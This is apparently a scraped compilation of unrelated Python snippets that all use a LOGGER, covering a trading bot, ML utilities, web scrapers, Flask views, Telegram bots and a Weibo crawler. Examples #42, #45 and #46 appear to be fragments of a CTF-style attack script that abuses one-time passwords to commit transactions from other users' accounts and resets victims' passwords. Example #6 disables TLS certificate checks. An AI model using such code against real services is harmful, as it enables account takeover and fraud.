Example #1
    def check_order_made_status(self):
        while True:
            order = self.client.get_order(symbol=self.symbol,
                                          orderId=self.order_made_id)
            status = order['status']

            LOGGER.info(f'CURRENT ORDER STATUS: {status}')

            if self.order_made_time + timedelta(minutes=5) < datetime.now():
                if status == 'PARTIALLY_FILLED':
                    if self.order_made_time + timedelta(
                            minutes=20) < datetime.now():
                        self.order_made_status = status
                        self.order_executed = order
                        if order['side'] == 'BUY':
                            self.bot_status = 'BOUGHT'
                        if order['side'] == 'SELL':
                            self.bot_status = 'SOLD'
                        return
                if status == 'NEW':
                    self.client.cancel_order(symbol=self.symbol,
                                             orderId=self.order_made_id)
            if status in ['FILLED', 'CANCELED', 'REJECTED', 'EXPIRED']:
                self.order_made_status = status
                self.order_executed = order
                if status == 'FILLED':
                    if order['side'] == 'BUY':
                        self.bot_status = 'BOUGHT'
                    if order['side'] == 'SELL':
                        self.bot_status = 'SOLD'
                return
            LOGGER.info('WAITING 30 SECONDS TO CHECK ORDER AGAIN')
            time.sleep(30)
Example #2
 def calculateHiddenLayerActivation(self, features):
     V = np.dot(features, np.transpose(self.inputWeights)) + self.bias
     if callable(self.activate_function):
         return self.activate_function(V)
     else:
         LOGGER.warn("activate_func could not callable,use sigmoid instead")
         return _internal_activation_funcs["sigmoid"](V)
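The `_internal_activation_funcs` table referenced by the fallback is not part of this excerpt. A minimal sketch of what such a mapping might contain, assuming the standard logistic sigmoid (the table itself is hypothetical):

import numpy as np

# Hypothetical stand-in for the module's activation table; only the
# "sigmoid" entry is required by the fallback above.
_internal_activation_funcs = {
    "sigmoid": lambda v: 1.0 / (1.0 + np.exp(-v)),
    "tanh": np.tanh,
}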
Example #3
 def spider(self):
     while True:
         if not self.uid_queue.empty():
             try:
                 uid = self.uid_queue.get()
                 print('searching user %s follows...' % uid)
                 total_page, people_list = self.travel_follow(uid)
                 if len(people_list):
                     self.db.friendships.save({
                         '_id': uid,
                         'follow_list': people_list,
                         'pages': total_page,
                         'last_modify': int(time.time())
                     })
                 else:
                     print('no update for %s.' % uid)
             except Exception as e:
                 LOGGER.error('User %s Follow Page Error: %s' % (uid, e))
         else:
             print('uid queue empty')
             time.sleep(2)
Example #4
def feature_decomposition(transformer, train_features, test_features):
    LOGGER.info("Beginning Dimensionality reduction using truncated SVD (%d features)" % transformer.n_components)
    train_dfeatures = transformer.fit_transform(train_features)
    #LOGGER.debug(["%6f " % transformer.explained_variance_ratio_[i] for i in range(5)])
    LOGGER.debug("%0.4f%% of total variance in %d features\n" % (
        100 * transformer.explained_variance_ratio_.sum(), transformer.n_components))
    return train_dfeatures, transformer.transform(test_features)
Example #5
def getUser(email):
    user = User.query.filter_by(email=email).first()
    form = EditUserForm(g.user.email)
    if user is None:
        flash('Utilisateur %s introuvable' % email)
        users = User.query.order_by('last_connection desc').all()
        return render_template('getUsers.html', users=users, app_name=app_name)
    else:
        if form.validate_on_submit():
            try:
                g.user.firstname = form.firstname.data
                g.user.email = form.email.data
                g.user.timezone = form.timezone.data
                if form.new_password.data != '':
                    g.user.set_password(form.new_password.data)
                db.session.add(g.user)
                db.session.commit()
                flash(u'tes modifs\' sont bien enregistrées')
            except Exception:
                db.session.rollback()
                flash(u'ERREUR : impossible d\'enregistrer tes modifs !')
                LOGGER.p_log(u'impossible d\'enregistrer les modifs', exception=exc_info())  
        else:
            for errors in form.errors.values():
                for error in errors:
                    flash(error)
                    print(error)
            form.firstname.data = g.user.firstname
            form.email.data = g.user.email
            form.timezone.data = g.user.timezone
        return render_template('getUser.html', app_name=app_name, user=user, form=form)
Example #6
    def execute_search(self, url, pause=2):
        """
        Executes a search to Twitter for the given URL
        :param url: URL to search twitter with
        :return: A JSON object with data from Twitter
        """
        headers = {'user-agent': self.get_random_user_agent()}
        try:
            requests.packages.urllib3.disable_warnings(
                requests.packages.urllib3.exceptions.InsecureRequestWarning)
            r = requests.get(url=url,
                             proxies=self.proxies,
                             headers=headers,
                             allow_redirects=False,
                             verify=False,
                             timeout=30)
            LOGGER.info(url)
            time.sleep(pause)
            content = r.text
            dejson = json.loads(content)
            return dejson

        # A ValueError here usually means the response body was not valid
        # JSON (for example, after a timed-out or blocked request); sleep for
        # the error delay, then retry.
        except ValueError:
            time.sleep(self.error_delay)
            return self.execute_search(url)
Example #7
    def check_profit_status_bought_position(self):
        LOGGER.info('CHECKING PROFIT STATUS FOR BOUGHT POSITION')

        self.profit_check_value = round(
            self.actual_price * self.quoteqty, 6) - round((
                (self.actual_price * self.quoteqty) * self.max_trade_taxes), 6)

        position_bought_winning = round(
            self.order_executed_quantity + self.stop_pair, 6)
        position_bought_losing = round(
            self.order_executed_quantity - self.stop_pair, 6)

        LOGGER.info(f'PROFIT CHECK VALUE: {self.profit_check_value}')

        LOGGER.info('STOP VALUES TO CHECK:')

        LOGGER.info(f'POSITION BOUGHT/WINNING: {position_bought_winning}')
        LOGGER.info(f'POSITION BOUGHT/LOSING: {position_bought_losing}')

        if self.profit_check_value > position_bought_winning:
            self.profit_status = 'WINNING'
        elif self.profit_check_value < position_bought_losing:
            self.profit_status = 'LOSING'
        else:
            self.profit_status = 'STANDING'
Example #8
def call():
    period = 10
    while True:
        try:
            response = requests.get(url=URL_CHECK_CONNECTION, params=params)
            if response.status_code == 200:
                LOGGER.info(
                    'Send check connection request to Smartsite successful!')
                active = json.loads(response.content)['result']
                if active:
                    LOGGER.info('Gateway is online!')
                else:
                    LOGGER.info('Gateway is offline!')
                    subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                                     shell=True,
                                     stdout=subprocess.PIPE)
            else:
                LOGGER.info('Response from Smartsite is not 200')
                subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                                 shell=True,
                                 stdout=subprocess.PIPE)
        except Exception as ex:
            LOGGER.info('Error when checking connection: %s', ex)
            subprocess.Popen(COMMAND_RESET_SERVICE_7688,
                             shell=True,
                             stdout=subprocess.PIPE)
        time.sleep(period)
Example #9
    def get_itunes_track_data(self, track_path, itunes_keys):
        # TODO: iTunes uses HTML encoding for some things (ampersands) and URL encoding for the rest
        with open('/Users/carmstrong/Music/iTunes/iTunes Music Library.xml', 'rb') as itunes_xml:
            tree = etree.parse(itunes_xml)

        itunes_track_path = 'file://' + urllib.parse.quote(track_path.encode('utf-8'), safe="/(),'")
        location_node = tree.xpath('//string[text()="{}"]'.format(itunes_track_path))

        if not location_node:
            LOGGER.info('{} not found in iTunes XML file.'.format(itunes_track_path))
            return

        results = {}
        for itunes_key in itunes_keys:
            try:
                itunes_value = location_node[0].xpath("../key[text()='{}']".format(itunes_key))[0].getnext().text
                try:
                    itunes_value = int(itunes_value)
                except (ValueError, TypeError):
                    continue
                results.update({itunes_key: itunes_value})

            except IndexError:
                continue

        return results
Example #10
    def _non_max_suppression(self, img, d):
        m, n = img.shape
        z = np.zeros((m, n), dtype=np.int32)
        angle = d * 180. / np.pi
        angle[angle < 0] += 180

        for i in range(1, m - 1):
            for j in range(1, n - 1):
                try:
                    q = 255
                    r = 255

                    if 0 <= angle[i, j] < 22.5 or \
                            157.5 <= angle[i, j] <= 180:
                        q = img[i, j + 1]
                        r = img[i, j - 1]
                    elif 22.5 <= angle[i, j] < 67.5:
                        q = img[i + 1, j - 1]
                        r = img[i - 1, j + 1]
                    elif 67.5 <= angle[i, j] < 112.5:
                        q = img[i + 1, j]
                        r = img[i - 1, j]
                    elif 112.5 <= angle[i, j] < 157.5:
                        q = img[i - 1, j - 1]
                        r = img[i + 1, j + 1]

                    if img[i, j] >= q and img[i, j] >= r:
                        z[i, j] = img[i, j]
                    else:
                        z[i, j] = 0

                except IndexError as e:
                    LOGGER.error(f"Reason: {e}")

        return z
Example #11
    def generateBitDataForPackages(cls, json_data):
        for item in json_data:
            distros = [key for key in item.keys()
                       if key not in ('packageName', 'version', 'url')]

            for distro in distros:
                for distro_version in item[distro]:
                    cls.distro_bit_mapping[distro + '_' + distro_version] = '1'

            values = cls.getDistroBitRepData(cls.distro_bit_mapping)
            LOGGER.debug(cls.distro_bit_mapping)

            item['bit_rep_dec'] = int(''.join(values), 2)
            item.pop('url', None)

            cls.distro_bit_mapping = {
                'UBUNTU_17.04': '0',
                'UBUNTU_16.10': '0',
                'UBUNTU_16.04': '0',
                'SUSE_LINUX_ENTERPRISE_SERVER_12-SP2': '0',
                'SUSE_LINUX_ENTERPRISE_SERVER_12-SP1': '0',
                'SUSE_LINUX_ENTERPRISE_SERVER_11-SP4': '0'
            }

        return json.dumps(json_data)
Example #12
def remove_switch(mode: str) -> None:
    """Remove switch_mode cron jobs.

    Args:
        mode (str): either 'on' or 'off'

    Raises:
        ValueError: mode is not 'on' or 'off'

    """
    if mode not in ['on', 'off']:
        message = f'Invalid mode: {mode}'
        LOGGER.error(message)
        raise ValueError(message)

    trigger = 'sunset' if mode == 'on' else 'shutdown'

    mode = f'switch_{mode}'

    if not CONF[trigger]['remove']:
        message = f'{mode} jobs will not be removed.'
    else:
        jobs = CRONTAB.remove_script_jobs(mode)
        message = f"Jobs ({mode}) removed: {jobs}"
    LOGGER.info(message)
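A brief usage sketch for the function above. Note that `remove_switch` relies on the module-level CONF, CRONTAB and LOGGER objects of its project, so this is illustrative only:

try:
    remove_switch('on')   # removes the switch_on jobs tied to the sunset trigger
    remove_switch('dim')  # anything other than 'on'/'off' is logged and raises
except ValueError as exc:
    print(f'rejected: {exc}')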
Example #13
def main():
    # get zip codes
    zip_codes = [row.zip_code for row in session.query(ZipCode).all()]

    # # add leading 0's to zip codes due to excel's stupidness
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].astype(str)
    # zip_codes_df['zip_code'] = zip_codes_df['zip_code'].apply(lambda x: '0' * (5 - len(x)) + x)

    current_month = datetime.date.today().month
    current_rows = session.query(Indeed).filter(
        extract('month', Indeed.date_created) == current_month).all()
    current_rows = [row.as_dict() for row in current_rows]
    existing_zip_codes = [row['zip_code'] for row in current_rows]
    remaining_zip_codes = [
        zip_code for zip_code in zip_codes
        if zip_code not in existing_zip_codes
    ]

    LOGGER.info(
        'Found {} rows for current month: {}. Extracting {} remaining zip codes'
        .format(len(current_rows), current_month, len(remaining_zip_codes)))

    for i, zip_code in enumerate(remaining_zip_codes):
        job_count = get_num_job_postings(zip_code)
        row = Indeed(zip_code=zip_code,
                     job_count=job_count,
                     date_created=datetime.date.today())
        session.merge(row)
        session.commit()

        LOGGER.info("Extracting zip code {} ({} of {})".format(
            zip_code, i, len(remaining_zip_codes)))
    session.close()
Example #14
def acoustid_lookup(fingerprint, duration):
    results = acoustid.lookup(ACOUST_ID_API_KEY,
                              fingerprint,
                              duration,
                              meta='recordings + releasegroups')
    if results.get('results') and results['results'][0].get('recordings'):
        LOGGER.info('AcoustID result found!')
        recordings = results['results'][0]['recordings']
        recording = max(recordings, key=lambda x: len(x.keys()))
        recording_id = recording['id']
        recording_artists = recording['artists']
        recording_title = recording['title']
        album_artist = recording_artists[0]['name']
        artist = ''.join([
            artist['name'] + artist.get('joinphrase', '')
            for artist in recording_artists
        ])
        album = recording['releasegroups'][0][
            'title']  # TODO: the results of this are often inconsistent

        return {
            'musicbrainz_releasetrackid': recording_id,
            'title': recording_title,
            'artist': artist,
            'albumartist': album_artist,
            'album': album
        }

    else:
        LOGGER.info('No AcoustID results found.')
        return {}
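For context, both inputs to `acoustid_lookup` can be derived from a local file with pyacoustid's `fingerprint_file`; a minimal sketch (the path is a placeholder):

import acoustid

# fingerprint_file returns a (duration, fingerprint) pair for the audio file
duration, fingerprint = acoustid.fingerprint_file('/path/to/track.mp3')
tags = acoustid_lookup(fingerprint, duration)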
Example #15
def update_package_by_id(package_id):
    package = db_session.query(Package) \
        .filter(Package.pid == package_id,
                or_(Package.last_updated.is_(None),
                    Package.last_updated <= datetime.utcnow() - timedelta(hours=2))) \
        .options(load_only(Package.owner,
                           Package.repo,
                           Package.path,
                           Package.ptype,
                           Package.date)) \
        .first()
    if package:
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)
        try:
            loop.run_until_complete(
                asyncio.ensure_future(update_package(package)))
            last_updated_prop = Property("last_updated",
                                         date_val=datetime.utcnow())
            db_session.merge(last_updated_prop)
            db_session.commit()
        except Exception as ex:
            LOGGER.error(ex)
            LOGGER.debug(traceback.format_exc())
        finally:
            loop.close()

    return redirect(url_for("index"))
Example #16
def paginate_request(resource_uri, page_size, request_callback=None):
    page = 1
    data = []
    while True:
        param_prefix = "&" if "?" in resource_uri else "?"
        pagination_params = "{}page={}&page_size={}".format(
            param_prefix, page, page_size)
        api_uri = "{resource_uri}{pagination_params}".format(
            resource_uri=resource_uri, pagination_params=pagination_params)
        response = request(api_uri)
        response_data = response["data"]
        if request_callback:
            request_callback(response_data)
        data += response_data
        if not response_data:
            break
        total_count = response["meta"]["page"]["total_count"]
        page = response["meta"]["page"]["current_page"]
        records_fetched_count = page_size * page
        LOGGER.info("paginate_request: {}\t records fetched: {}/{}".format(
            resource_uri, records_fetched_count, total_count))
        if records_fetched_count >= total_count:
            break
        page += 1

    return data
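A minimal usage sketch for `paginate_request`; the '/devices' URI and the callback are illustrative, not from the source project:

def log_batch(batch):
    LOGGER.info('received %d records', len(batch))

devices = paginate_request('/devices?active=true', page_size=100,
                           request_callback=log_batch)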
Example #17
 def run(self):
     flag = True
     try:
         self.socket.connect((HOST, PORT))
     except error:
         print('connection failed')
         return
     print('connected to server %s:%s' % (HOST, PORT))
     while flag:
         try:
             if not self.controler.stoped:
                 if self.task == 'random':
                     uid, pages = self.request(action='getuid')
                     self.travel(uid=uid, pages=pages)
                     time.sleep(1)
                 elif self.task == 'target':
                     uid = self.request(action='gettargetuid')
                     self.target_travel(time.time() - 24 * 60 * 60, uid=uid)
                     time.sleep(1)
                 else:
                     pass
             else:
                 time.sleep(1)
         except Exception as e:
             LOGGER.error('Unhandled Error: %s' % e)
Example #18
def translate(context, update):
    if AUTO_TRANSLATE is True:
        # Checks if Language is English, if Confident it isn't Translate & Reply
        msg_text = context.effective_message.text
        lang, confidence = identifier.classify(msg_text)

        if lang != "en" and confidence >= 0.9:
            try:
                # Create Langpair to Show Translation API What We Need
                langpair = lang + '|en'

                translated_msg = requests.get(
                    'https://api.mymemory.translated.net/get',
                    params={
                        'q': msg_text,
                        'key': MYMEMORY_KEY, # API Key
                        'langpair': langpair,
                        'de': MYMEMORY_CONTACT # Contact Email
                        }).json()

                # Grab Translated Text from Nested JSON Response
                final_translation = translated_msg['matches'][0]['translation']

                # Respond with Translation to Non-English Message
                context.effective_message.reply_text(
                    messages.msg_translate.format(final_translation),
                    parse_mode='HTML')
            except Exception as e:
                LOGGER.warning(f'Translation Failed - {str(e)}')
        else:
            return
Example #19
def gas(update, context):
    # Show Current Estimates for Gas prices
    remove_command(context, update)
    try:
        resp = requests.get("https://api.etherscan.io/api?module=gastracker&action=gasoracle")
        if resp.status_code == 200:
            prices = resp.json()

            low = prices['result']['SafeGasPrice']
            standard = prices['result']['ProposeGasPrice']
            fast = prices['result']['FastGasPrice']

            message = messages.msg_gas.format(fast, standard, low)

            gas_msg = context.bot.send_message(
                chat_id=update.effective_message.chat.id,
                text=message,
                parse_mode=ParseMode.HTML,
                disable_web_page_preview=True
                )
            cleaner(context, gas_msg)

    except TypeError as e:
        LOGGER.warning(f'Rate Limited - {str(e)}')
        message = "Sorry Unable to Fetch Gas Estimates Right Now..."
        gas_message = context.bot.send_message(
            chat_id=update.effective_message.chat.id,
            text=message,
            parse_mode=ParseMode.HTML
            )
        cleaner(context, gas_message)
Example #20
 def run(self):
     while True:
         try:
             if not self.data_queue.empty():
                 data = self.data_queue.get()
                 if hasattr(data, 'target_statuses'):
                     for status in data.target_statuses:
                         exist = self.db['target_statuses'].find({'_id': status['_id']}).count()
                         if not exist:
                             self.db['target_statuses'].insert(status)
                 if hasattr(data, 'statuses'):
                     posts = []
                     for status in data.statuses:
                         exist = self.db.statuses.find({'_id': status['_id']}).count()
                         if not exist:
                             posts.append(status)
                     if len(posts):
                         self.db.statuses.insert(posts)
                 if hasattr(data, 'users'):
                     for user in data.users:
                         exist = self.db.users.find_one({'_id': user['_id']})
                         if not exist:
                             self.db.users.insert(user)
                 if hasattr(data, 'user'):
                     self.db.users.save(data.user)
             else:
                 if self.stoped:
                     break
                 else:
                     time.sleep(0.5)
         except Exception as e:
             LOGGER.error(e)
             continue
Example #21
def do_synchronize_generate(mirrors):
    yield "Starting synchronize...\n"

    for mirror in mirrors:
        yield "Synchronizing '{}'\n".format(mirror.text_val)
        try:
            resp = requests.get(mirror.text_val)
            if resp.status_code != 200:
                yield "Errornous http status code: {}. Skipping this mirror.\n".format(
                    resp.status_code)
                continue

            packages_mirror = json.loads(resp.content)
            packages = db_session.query(Package).options(
                load_only(Package.owner, Package.repo, Package.path,
                          Package.ptype)).all()
            packages_added = 0
            for package_mirror in packages_mirror:
                found = False
                if "path" not in package_mirror:
                    package_mirror["path"] = None
                for package in packages:
                    if package_mirror["owner"] == package.owner \
                            and package_mirror["ptype"] == package.ptype \
                            and package_mirror["repo"] == package.repo \
                            and package_mirror["path"] == package.path:
                        found = True
                        break
                if not found:
                    LOGGER.info("Synchronize: adding %s", package_mirror)
                    insert_package(package_mirror["owner"],
                                   package_mirror["repo"],
                                   package_mirror["ptype"],
                                   package_mirror["path"],
                                   dateutil.parser.parse(
                                       package_mirror["added"]),
                                   commit=False)
                    yield "adding {}\n".format(package_mirror)
                    packages_added += 1

            if packages_added > 0:
                try:
                    db_session.commit()
                except Exception as ex:
                    db_session.rollback()
                    LOGGER.error(ex)
                    LOGGER.debug("{}: {}\n".format(ex, traceback.format_exc()))
                    yield "{}\n".format(ex)
            else:
                db_session.rollback()
            yield "Mirror '{}': {} packages added.\n".format(
                mirror.text_val, packages_added)
        except Exception as ex:
            LOGGER.error(ex)
            error = "{}: {}\n".format(ex, traceback.format_exc())
            LOGGER.debug(error)
            yield error

    yield "Synchronization done.\n"
Example #22
def remove_command(context, update):
    # Delete Bot Commands from Group Members
    msg = update.effective_message
    try:
        msg.delete()
        LOGGER.info(f'CMD Message Deleted - {msg.message_id}')
    except BaseException as e:
        LOGGER.info(f'CMD Message Already Deleted - {str(e)}')
Example #23
    def check_profit_status(self):
        if self.bot_status == 'BOUGHT':
            self.check_profit_status_bought_position()

        if self.bot_status == 'SOLD':
            self.check_profit_status_sold_position()

        LOGGER.info(f'PROFIT STATUS: {self.profit_status}')
Example #24
 def get_instance(cls):
     LOGGER.debug('get_instance: In get_instance')
     if not cls.INSTANCE:
         cls.INSTANCE = PackageSearch()
         cls.INSTANCE.supported_distros = cls.loadSupportedDistros()
         cls.INSTANCE.package_data = cls.loadPackageData()
         LOGGER.debug('get_instance: Creating singleton instance in get_instance')
     return cls.INSTANCE
Example #25
def handle(fd, address):
    global data_queue
    global uid_queue
    global target_uid_queue
    db = getDB()
    LOGGER.info('connection accepted from %s:%s' % address)
    while True:
        data = fd.readline()
        if not data:
            break
        data = data[:-2]
        r = json.loads(data, object_hook=_obj_hook)
        if hasattr(r, 'action'):
            action = r.action
        else:
            break
        if action == 'postdata':
            try:
                data_queue.put(r.data)
                fd.write(json.dumps({'status': 'ok'})+'\r\n')
            except Exception:
                fd.write(json.dumps({'error': 'bad request data'})+'\r\n')
            fd.flush()
        elif action == 'getuid':
            if not uid_queue.empty():
                uid = uid_queue.get()
                pages = 0
                user = db.users.find_one({'_id': uid})
                try:
                    pages = user['pages']
                except Exception:
                    pages = 0
                fd.write(json.dumps({'uid': uid, 'pages': pages})+'\r\n')
            else:
                fd.write(json.dumps({'error': 'uid queue empty'})+'\r\n')
            fd.flush()
        elif action == 'getuserinfo':
            try:
                name = r.data
                user = db.users.find_one({'name': name})
                try:
                    u = {'_id': user['_id'], 'gender': user['gender'], 'location': user['location']}
                    fd.write(json.dumps({'user': u})+'\r\n')
                except Exception:
                    fd.write(json.dumps({'error': 'not found'})+'\r\n')
            except Exception:
                fd.write(json.dumps({'error': 'bad request data'})+'\r\n')
            fd.flush()
        elif action == 'gettargetuid':
            uid = target_uid_queue.get()
            if uid:
                fd.write(json.dumps({'uid': uid})+'\r\n')
            else:
                fd.write(json.dumps({'error': 'target uid queue empty'})+'\r\n')
            fd.flush()
        else:
            break
    LOGGER.info('end connection %s:%s' % address)
Example #26
 def save(self):
     self.sync()
     if self.easyID3.is_modified:
         LOGGER.info('Saving file changes...')
         self.easyID3.save()
     if session.is_modified(self.model):
         LOGGER.info('Committing model changes...')
         session.merge(self.model)
         session.commit()
Example #27
def delete_bot_message(update, context):
    try:
        context.bot.deleteMessage(
            chat_id=update.effective_message.chat.id,
            message_id=update.effective_message.message_id
        )
    except BaseException as e:
        LOGGER.warning(f'<delete_bot_message> Exception Occurred: {str(e)}')
Example #28
def request(api_uri, ignore_404=False):
    response = requests.get("{}{}".format(API_URL, api_uri))
    if response.status_code == 404 and ignore_404:
        LOGGER.error("request failed 404 - {}".format(api_uri))
        return
    if not response.ok:
        raise Exception("request failed with status: {} for url: {}".format(
            response.status_code, response.url))
    return response.json()
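Usage sketch for the helper above; the endpoint is hypothetical. With ignore_404=True a missing resource yields None instead of an exception:

user = request('/users/42', ignore_404=True)
if user is None:
    LOGGER.info('user 42 not found, skipping')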
Example #29
def check_command_send_rpc(command):
    try:
        return utils._check_command_send_rpc(command.get('device', None),
                                             command.get('command', None))
    except Exception as ex:
        print(ex)
        LOGGER.error(
            'Error at check_command_send_rpc function with message: %s', ex)
Example #30
 def gettargetuid(self):
     self.socket.sendall(json.dumps({'action': 'gettargetuid'}) + '\r\n')
     res = self.socket.recv(1024)
     r = json.loads(res, object_hook=_obj_hook)
     if hasattr(r, 'error'):
         LOGGER.error(r.error)
         return None
     else:
         return r.uid
Example #31
def webhookHandler(event):
    """ Travese to webhook handler and let it deal with the error.
    """
    try:
        return event.error['context'].restrictedTraverse(
            '@@logbook_webhook')(event)
    except Exception, e:
        LOGGER.error(
            "An error occured while notifying with webhooks: %s" % str(e))
Example #32
def mailHandler(event):
    """ notify this error
    """
    try:
        return event.error['context'].restrictedTraverse(
            '@@logbook_mail')(event)
    except Exception as e:
        LOGGER.error(
            "An error occurred while notifying recipients: %s" % str(e))
Example #33
def prepare_features(train_movies, test_movies):
    LOGGER.debug("Training samples: %d" % len(train_movies))
    # Extract
    vectorizer = CountVectorizer(decode_error=u'replace')
    (train_features, train_labels, test_features, test_labels) = feature_extraction_sklearn(
        vectorizer, train_movies, test_movies
    )
    LOGGER.debug("Original feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size)
    return train_features, train_labels, test_features, test_labels
Example #34
def classify(classifier, train_features, train_labels, test_features,
             test_labels, desc="Linear classifier"):
    LOGGER.info("Beginning %s" % desc)
    classifier.fit(train_features, train_labels)
    results = classifier.predict(test_features)
    correct = get_correct_num(results, test_labels)
    LOGGER.info("%s predicted %d/%d correctly (%0.3f%% accuracy)\n" % (
        desc, correct, len(test_labels), correct / len(test_labels) * 100))
    return results
Example #35
def rescale_features(train, test):
    LOGGER.info("Rescaling feature matrices")
    if issparse(train):
        LOGGER.info("Converting feature matrices from sparse to dense")
        train = csr_matrix(train).todense()
        test = csr_matrix(test).todense()
    scaler = StandardScaler(with_mean=False)
    train_features_rs = scaler.fit_transform(train)
    return train_features_rs, scaler.transform(test)
Example #36
 def get_instance(cls):
     LOGGER.debug('get_instance: In get_instance')
     if not cls.INSTANCE:
         cls.INSTANCE = PackageSearch()
         cls.INSTANCE.DISTRO_BIT_MAP = cls.loadSupportedDistros()
         cls.INSTANCE.package_data = cls.loadPackageData()
         cls.INSTANCE.local_cache = {}
         cls.INSTANCE.cache_keys = []
         LOGGER.debug('get_instance: Creating singleton instance in get_instance')
     return cls.INSTANCE
Example #37
def iteration_request(id, uri_template, ignore_404, request_callback):
    resource_uri = uri_template.format(id)
    response = request(resource_uri, ignore_404=ignore_404)
    if response and response['data']:
        if request_callback:
            request_callback(response['data'])
        LOGGER.info("{} - done".format(resource_uri))
        return response['data']
    LOGGER.info("{} - response empty".format(resource_uri))
    return {}
Example #38
 def acquire_track_model(self):
     # determine if fingerprint present, if not generate
     if not self.fingerprint:
         self.query_fingerprint()
     # use fingerprint to query model
     self.model = session.query(SavedTrack).get(self.fingerprint)
     # if 0 results, create model
     if not self.model:
         LOGGER.info('Track not found in database; creating...')
         self.model = SavedTrack()
Example #39
def check_mentions(api) -> None:
    """Checks for new mentions and favorite this mentions."""
    # Retrieve the last 20 mentions.
    mentions = api.mentions_timeline()
    for tweet in mentions:
        if not tweet.favorited:
            try:
                tweet.favorite()
                LOGGER.info(f'Tweet from {tweet.user.name} favorited!')
            except Exception:
                LOGGER.error('Error on fav', exc_info=True)
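A minimal sketch of wiring up the `api` argument with tweepy; the credentials are placeholders:

import tweepy

auth = tweepy.OAuthHandler('CONSUMER_KEY', 'CONSUMER_SECRET')
auth.set_access_token('ACCESS_TOKEN', 'ACCESS_SECRET')
api = tweepy.API(auth)
check_mentions(api)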
Example #40
def decompose_tsvd_target(transformer, train_features, test_features, target_cuml_var_ratio=0.9):
    LOGGER.info("Aiming for %.3f%% cumulative total sum of variance" % (target_cuml_var_ratio * 100))
    #transformer = TruncatedSVD(n_components=n_features)
    train_d, test_d = feature_decomposition(transformer, train_features, test_features)
    if sum(transformer.explained_variance_ratio_) < target_cuml_var_ratio:
        return decompose_tsvd_target(
            TruncatedSVD(n_components=(transformer.n_components*2)),
            train_features, test_features,
            target_cuml_var_ratio)
    LOGGER.debug("Reduced feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size)
    return transformer, train_d, test_d
Example #41
def main():
    LOGGER.info('Extracting building permit data...')
    post_data_list = generate_post_data((1, 12), (2005, 2015))

    pool = ThreadPool(5)
    results = pool.map(get_census_reponse, post_data_list)
    results_array = parse_results(results)

    for result in results_array:
        session.merge(BuildingPermit(**result))

    session.commit()
Example #42
    def do_otp(self, obj):
        data = self._pre_otp(obj)
        if data is False:
            return False

        step3 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
            urllib.urlencode({
                'step': 'step3'
            })
        )
        step4 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
            urllib.urlencode({
                'step': 'step4'
            })
        )
        # Case:
        # 1) No otp
        if 'Commit transaction.' in data:
            LOGGER.info('No otp')
            data = my_url_open(obj.opener, step3)
        # 2) SmartCard otp
        elif 'One-time password:' in data:
            LOGGER.info('Smart card otp')

            data = my_url_open(obj.opener, step4)
        # 3) Brute otp
        elif 'One-time password (#' in data:
            tmp_ticket = RE_TICKET.search(data)
            if not tmp_ticket:
                return False
            tmp_ticket = tmp_ticket.group(1)
            step_OTP1 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                urllib.urlencode({
                    'step': 'step3',
                    'OTP': obj.gen_otp(tmp_ticket, 2)
                })
            )
            step_OTP2 = urllib2.Request('http://{0}/transaction.php'.format(TARGET_HOST),
                urllib.urlencode({
                    'step': 'step3',
                    'OTP': obj.gen_otp(tmp_ticket, 3)
                })
            )
            data = my_url_open(obj.opener, step_OTP1)
            data += my_url_open(obj.opener, step_OTP2)
            data = my_url_open(obj.opener, step4)
        else:
            LOGGER.error('Bad transaction page: ')
            LOGGER.debug('%r', data)
        result = 'Transaction committed!' in data
        if result:
            LOGGER.info('Transaction from: %s', obj.number)
        return result
Example #43
def five_ab(train_features, train_labels, test_features, test_labels):
    # Reduce feature dimensions
    transformer = TruncatedSVD(n_components=N_FEATURES)
    transformer, train_features, test_features = decompose_tsvd_target(
        transformer, train_features, test_features, TARGET_CUM_VAR_RATIO
    )
    #train_features, test_features = feature_decomposition(transformer, train_features, test_features)
    LOGGER.debug("Reduced feature vectors size: %d" % csr_matrix(train_features[-1]).toarray().size)

    # Rescale features
    train_features, test_features = rescale_features(train_features, test_features)
    return train_features, train_labels, test_features, test_labels
Example #44
def persist_zillow_metrics(df):
    metrics_df = df.drop(['city', 'metro', 'state', 'county'], axis=1)
    session.query(ZillowMetrics).delete()  # TODO: should append to existing data in case zillow changes something
    session.commit()
    insert_chunk = 100000
    index_start = 0
    while index_start < len(metrics_df):
        LOGGER.info('Persisting Zillow Metrics rows: {} of {}'.format(index_start + insert_chunk,
                                                                      len(metrics_df)))
        engine.execute(
            ZillowMetrics.__table__.insert(metrics_df[index_start:index_start + insert_chunk].to_dict('records')))
        index_start += insert_chunk
Example #45
 def do_change(self, obj):
     LOGGER.info('Changing password for: %s', obj.user)
     req = urllib2.Request('http://{0}/change_password.php'.format(TARGET_HOST),
         urllib.urlencode({
             'password': obj.password,
             'newpassword': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
             'newpassword2': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
             })
     )
     data = my_url_open(obj.opener, req)
     if 'error' not in data:
         LOGGER.critical('Password changed for user: %s', obj.user)
         return True
Example #46
    def run(self):
        LOGGER.info('Start stealer')
        while 1:
            try:
                obj = GOOD.get(timeout=2)
            except Exception as e:
                LOGGER.error('Unknown error in Stealer: %s', e)
                continue
            if FORCE_STEAL:
                self.do_otp(obj)

            CHANGE.put(obj)
            GOOD.task_done()
Example #47
 def postdata(self, **kw):
     try:
         data = kw['data']
     except KeyError:
         return None
     self.socket.sendall(json.dumps({'action': 'postdata', 'data': data}) + '\r\n')
     res = self.socket.recv(1024)
     r = json.loads(res, object_hook=_obj_hook)
     if hasattr(r, 'error'):
         LOGGER.error(r.error)
         return None
     else:
         return r.status
Example #48
 def target_travel(self, ts, uid=None):
     if not uid:
         return None
     if uid in self.black_list:
         return None
     url = 'http://weibo.cn/u/' + uid
     current_page = 1
     home_page_soup = BeautifulSoup(self.client.urlopen(url + '?page=1'))
     try:
         name, verified, gender, location, desc, tags = self._travel_info(uid)
         print('target spider %d searching uid: %s name: %s...' % (self.num, uid, name))
     except Exception as e:
